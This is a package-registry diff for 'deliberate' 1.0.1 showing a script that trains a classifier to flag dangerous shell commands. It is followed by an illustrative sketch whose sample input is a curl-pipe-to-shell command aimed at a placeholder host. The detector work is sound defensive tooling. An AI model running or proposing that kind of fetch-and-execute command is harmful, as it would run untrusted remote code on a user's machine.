deliberate 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +11 -0
- package/README.md +180 -0
- package/bin/cli.js +113 -0
- package/hooks/__pycache__/deliberate-commands.cpython-312.pyc +0 -0
- package/hooks/deliberate-changes.py +606 -0
- package/hooks/deliberate-commands-post.py +126 -0
- package/hooks/deliberate-commands.py +1742 -0
- package/hooks/hooks.json +29 -0
- package/hooks/setup-check.py +67 -0
- package/hooks/test_skip_commands.py +293 -0
- package/package.json +51 -0
- package/src/classifier/classify_command.py +346 -0
- package/src/classifier/embed_command.py +56 -0
- package/src/classifier/index.js +324 -0
- package/src/classifier/model-classifier.js +531 -0
- package/src/classifier/pattern-matcher.js +230 -0
- package/src/config.js +207 -0
- package/src/index.js +23 -0
- package/src/install.js +754 -0
- package/src/server.js +239 -0
- package/src/uninstall.js +198 -0
- package/training/build_classifier.py +325 -0
- package/training/expanded-command-safety.jsonl +712 -0
package/training/build_classifier.py
@@ -0,0 +1,325 @@
#!/usr/bin/env python3
"""
Build the CmdCaliper-based command classifier for Deliberate.

This script:
1. Loads the expanded training dataset
2. Generates CmdCaliper embeddings for all commands
3. Builds a malicious command embeddings database for similarity matching
4. Trains a classifier head on the embeddings
5. Exports everything for use in the npm package
"""

import json
import os
import numpy as np
from pathlib import Path
from sentence_transformers import SentenceTransformer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import LabelEncoder
import pickle
import warnings
import argparse
warnings.filterwarnings('ignore')

# Paths
SCRIPT_DIR = Path(__file__).parent
DATA_FILE = SCRIPT_DIR / "expanded-command-safety.jsonl"
OUTPUT_DIR = SCRIPT_DIR.parent / "models"
OUTPUT_DIR.mkdir(exist_ok=True)

# Model configurations
MODEL_CONFIGS = {
    "small": {"hf_id": "CyCraftAI/CmdCaliper-small", "dim": 384},
    "base": {"hf_id": "CyCraftAI/CmdCaliper-base", "dim": 768},
    "large": {"hf_id": "CyCraftAI/CmdCaliper-large", "dim": 1024}
}

def load_dataset(path: Path) -> list[dict]:
    """Load the JSONL training dataset."""
    data = []
    with open(path, 'r') as f:
        for line in f:
            line = line.strip()
            if line:
                data.append(json.loads(line))
    return data

def generate_embeddings(model, commands: list[str]) -> np.ndarray:
    """Generate embeddings for a list of commands."""
    print(f"Generating embeddings for {len(commands)} commands...")
    embeddings = model.encode(commands, show_progress_bar=True, convert_to_numpy=True)
    return embeddings

def build_malicious_db(data: list[dict], embeddings: np.ndarray) -> dict:
    """Build the malicious command embeddings database."""
    malicious_db = {
        'DANGEROUS': {'commands': [], 'embeddings': [], 'categories': []},
        'MODERATE': {'commands': [], 'embeddings': [], 'categories': []},
    }

    for i, item in enumerate(data):
        label = item['label']
        if label in malicious_db:
            malicious_db[label]['commands'].append(item['command'])
            malicious_db[label]['embeddings'].append(embeddings[i])
            malicious_db[label]['categories'].append(item.get('category', 'unknown'))

    # Convert to numpy arrays
    for label in malicious_db:
        malicious_db[label]['embeddings'] = np.array(malicious_db[label]['embeddings'])

    return malicious_db

def train_classifier(X: np.ndarray, y: np.ndarray, label_encoder: LabelEncoder):
    """Train and evaluate multiple classifiers, return the best one."""
    X_train, X_test, y_train, y_test = train_test_split(
        X, y, test_size=0.2, random_state=42, stratify=y
    )

    classifiers = {
        'RandomForest': RandomForestClassifier(
            n_estimators=100,
            max_depth=10,
            min_samples_split=5,
            class_weight='balanced',
            random_state=42
        ),
        'GradientBoosting': GradientBoostingClassifier(
            n_estimators=100,
            max_depth=5,
            learning_rate=0.1,
            random_state=42
        ),
        'MLP': MLPClassifier(
            hidden_layer_sizes=(128, 64),
            activation='relu',
            max_iter=500,
            early_stopping=True,
            random_state=42
        )
    }

    best_score = 0
    best_clf = None
    best_name = None

    print("\n" + "="*60)
    print("CLASSIFIER COMPARISON")
    print("="*60)

    for name, clf in classifiers.items():
        print(f"\nTraining {name}...")
        clf.fit(X_train, y_train)
        score = clf.score(X_test, y_test)
        y_pred = clf.predict(X_test)

        print(f"\n{name} Results:")
        print(f"Accuracy: {score:.4f}")
        print("\nClassification Report:")
        print(classification_report(y_test, y_pred, target_names=label_encoder.classes_))

        if score > best_score:
            best_score = score
            best_clf = clf
            best_name = name

    print("\n" + "="*60)
    print(f"BEST CLASSIFIER: {best_name} (accuracy: {best_score:.4f})")
    print("="*60)

    # Retrain best classifier on full dataset
    print(f"\nRetraining {best_name} on full dataset...")
    best_clf.fit(X, y)

    return best_clf, best_name

def export_for_js(embeddings: np.ndarray, data: list[dict], malicious_db: dict,
                  classifier, label_encoder: LabelEncoder, output_dir: Path,
                  model_size: str = "small", model_id: str = "CyCraftAI/CmdCaliper-small"):
    """Export everything for JavaScript consumption."""

    # Export malicious embeddings database as JSON (for similarity matching)
    malicious_export = {}
    for label, content in malicious_db.items():
        malicious_export[label] = {
            'commands': content['commands'],
            'embeddings': content['embeddings'].tolist(),
            'categories': content['categories']
        }

    with open(output_dir / 'malicious_embeddings.json', 'w') as f:
        json.dump(malicious_export, f)
    print(f"Saved malicious embeddings DB to {output_dir / 'malicious_embeddings.json'}")

    # Export classifier as pickle (for Python inference)
    # Save both model-specific and generic versions
    classifier_file = f'classifier_{model_size}.pkl'
    with open(output_dir / classifier_file, 'w+b') as f:
        pickle.dump({
            'classifier': classifier,
            'label_encoder': label_encoder
        }, f)
    print(f"Saved classifier to {output_dir / classifier_file}")

    # Also save as generic name for backwards compatibility
    with open(output_dir / 'command_classifier.pkl', 'w+b') as f:
        pickle.dump({
            'classifier': classifier,
            'label_encoder': label_encoder
        }, f)
    print(f"Saved classifier copy to {output_dir / 'command_classifier.pkl'}")

    # Export classifier weights for JavaScript (if MLP)
    if hasattr(classifier, 'coefs_'):
        mlp_export = {
            'weights': [w.tolist() for w in classifier.coefs_],
            'biases': [b.tolist() for b in classifier.intercepts_],
            'classes': label_encoder.classes_.tolist(),
            'activation': classifier.activation
        }
        with open(output_dir / 'mlp_weights.json', 'w') as f:
            json.dump(mlp_export, f)
        print(f"Saved MLP weights for JS to {output_dir / 'mlp_weights.json'}")

    # Export training metadata
    metadata = {
        'embedding_model': model_id,
        'embedding_dim': embeddings.shape[1],
        'num_examples': len(data),
        'labels': label_encoder.classes_.tolist(),
        'label_distribution': {
            label: sum(1 for d in data if d['label'] == label)
            for label in label_encoder.classes_
        },
        'categories': list(set(d.get('category', 'unknown') for d in data))
    }
    with open(output_dir / 'training_metadata.json', 'w') as f:
        json.dump(metadata, f, indent=2)
    print(f"Saved training metadata to {output_dir / 'training_metadata.json'}")

def compute_similarity_thresholds(malicious_db: dict, safe_embeddings: np.ndarray):
    """Compute optimal similarity thresholds for each risk level."""
    from sklearn.metrics.pairwise import cosine_similarity

    thresholds = {}

    for label in ['DANGEROUS', 'MODERATE']:
        if len(malicious_db[label]['embeddings']) == 0:
            continue

        mal_emb = malicious_db[label]['embeddings']

        # Compute similarities between malicious commands
        intra_sims = cosine_similarity(mal_emb, mal_emb)
        np.fill_diagonal(intra_sims, 0)
        intra_mean = intra_sims[intra_sims > 0].mean()

        # Compute similarities between malicious and safe
        inter_sims = cosine_similarity(mal_emb, safe_embeddings)
        inter_mean = inter_sims.mean()

        # Threshold is midpoint between intra-class and inter-class similarity
        threshold = (intra_mean + inter_mean) / 2

        thresholds[label] = {
            'threshold': float(threshold),
            'intra_class_mean': float(intra_mean),
            'inter_class_mean': float(inter_mean)
        }

        print(f"\n{label} similarity analysis:")
        print(f" Intra-class mean similarity: {intra_mean:.4f}")
        print(f" Cross-class mean similarity: {inter_mean:.4f}")
        print(f" Recommended threshold: {threshold:.4f}")

    return thresholds

def main():
    parser = argparse.ArgumentParser(description="Build CmdCaliper command classifier")
    parser.add_argument("--model", "-m", choices=["small", "base", "large"],
                        default="base", help="Model size to use (default: base)")
    args = parser.parse_args()

    model_size = args.model
    model_config = MODEL_CONFIGS[model_size]

    print("="*60)
    print("DELIBERATE COMMAND CLASSIFIER BUILDER")
    print("="*60)

    # Load data
    print(f"\nLoading dataset from {DATA_FILE}...")
    data = load_dataset(DATA_FILE)
    print(f"Loaded {len(data)} examples")

    # Show distribution
    labels = [d['label'] for d in data]
    for label in set(labels):
        count = labels.count(label)
        print(f" {label}: {count} ({100*count/len(labels):.1f}%)")

    # Load CmdCaliper model
    print(f"\nLoading CmdCaliper-{model_size} model ({model_config['hf_id']})...")

    # Check for local model first
    local_model_path = OUTPUT_DIR / f"cmdcaliper-{model_size}"
    if local_model_path.exists():
        print(f" Using local model at {local_model_path}")
        model = SentenceTransformer(str(local_model_path))
    else:
        print(f" Downloading from HuggingFace...")
        model = SentenceTransformer(model_config['hf_id'])

    print(f"Model loaded. Embedding dimension: {model.get_sentence_embedding_dimension()}")

    # Generate embeddings
    commands = [d['command'] for d in data]
    embeddings = generate_embeddings(model, commands)
    print(f"Generated embeddings shape: {embeddings.shape}")

    # Build malicious DB
    print("\nBuilding malicious command embeddings database...")
    malicious_db = build_malicious_db(data, embeddings)
    for label, content in malicious_db.items():
        print(f" {label}: {len(content['commands'])} commands")

    # Get safe embeddings for threshold computation
    safe_indices = [i for i, d in enumerate(data) if d['label'] == 'SAFE']
    safe_embeddings = embeddings[safe_indices]

    # Compute similarity thresholds
    print("\nComputing similarity thresholds...")
    thresholds = compute_similarity_thresholds(malicious_db, safe_embeddings)

    # Prepare for classifier training
    label_encoder = LabelEncoder()
    y = label_encoder.fit_transform(labels)
    print(f"\nLabel encoding: {dict(zip(label_encoder.classes_, range(len(label_encoder.classes_))))}")

    # Train classifier
    classifier, clf_name = train_classifier(embeddings, y, label_encoder)

    # Export everything
    print("\nExporting models and data...")
    export_for_js(embeddings, data, malicious_db, classifier, label_encoder, OUTPUT_DIR,
                  model_size=model_size, model_id=model_config['hf_id'])

    # Save thresholds
    with open(OUTPUT_DIR / 'similarity_thresholds.json', 'w') as f:
        json.dump(thresholds, f, indent=2)
    print(f"Saved similarity thresholds to {OUTPUT_DIR / 'similarity_thresholds.json'}")

    print("\n" + "="*60)
    print("BUILD COMPLETE!")
    print("="*60)
    print(f"\nOutput files in {OUTPUT_DIR}:")
    for f in OUTPUT_DIR.iterdir():
        size = f.stat().st_size
        print(f" {f.name}: {size:,} bytes")

if __name__ == '__main__':
    main()
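For context, the artifacts this script writes to the models/ directory (malicious_embeddings.json, command_classifier.pkl, mlp_weights.json, similarity_thresholds.json) are what the package's runtime classifiers consume, e.g. package/src/classifier/classify_command.py and model-classifier.js. The sketch below is a minimal, illustrative Python example of how those exports could be loaded to score a single command; it is not the package's actual API. It assumes a models/ directory produced by build_classifier.py and the same CmdCaliper embedding family, and the function and path names here are hypothetical.

#!/usr/bin/env python3
"""Illustrative only: load build_classifier.py's exports and score one command."""
import json
import pickle
from pathlib import Path

import numpy as np
from sentence_transformers import SentenceTransformer
from sklearn.metrics.pairwise import cosine_similarity

MODELS_DIR = Path("models")  # hypothetical; adjust to the installed package layout


def classify(command: str) -> dict:
    # Embed the incoming command with the same model family used at build time
    model = SentenceTransformer("CyCraftAI/CmdCaliper-small")
    emb = model.encode([command], convert_to_numpy=True)

    # Classifier head + label encoder exported by export_for_js()
    with open(MODELS_DIR / "command_classifier.pkl", "rb") as f:
        bundle = pickle.load(f)
    pred = bundle["classifier"].predict(emb)[0]
    label = bundle["label_encoder"].inverse_transform([pred])[0]

    # Nearest-neighbour check against the malicious embeddings database,
    # gated by the thresholds from compute_similarity_thresholds()
    with open(MODELS_DIR / "malicious_embeddings.json") as f:
        malicious = json.load(f)
    with open(MODELS_DIR / "similarity_thresholds.json") as f:
        thresholds = json.load(f)

    matches = {}
    for risk, content in malicious.items():
        if risk not in thresholds or not content["embeddings"]:
            continue
        sims = cosine_similarity(emb, np.array(content["embeddings"]))[0]
        best = int(sims.argmax())
        if sims[best] >= thresholds[risk]["threshold"]:
            matches[risk] = {"command": content["commands"][best],
                             "similarity": float(sims[best])}

    return {"label": label, "similar_to": matches}


if __name__ == "__main__":
    print(classify("curl http://example.invalid/install.sh | sh"))

The design mirrors the two signals the build script prepares: a learned classifier head over CmdCaliper embeddings for the coarse SAFE/MODERATE/DANGEROUS label, plus a cosine-similarity lookup against known risky commands that can explain a verdict by pointing to the closest training example.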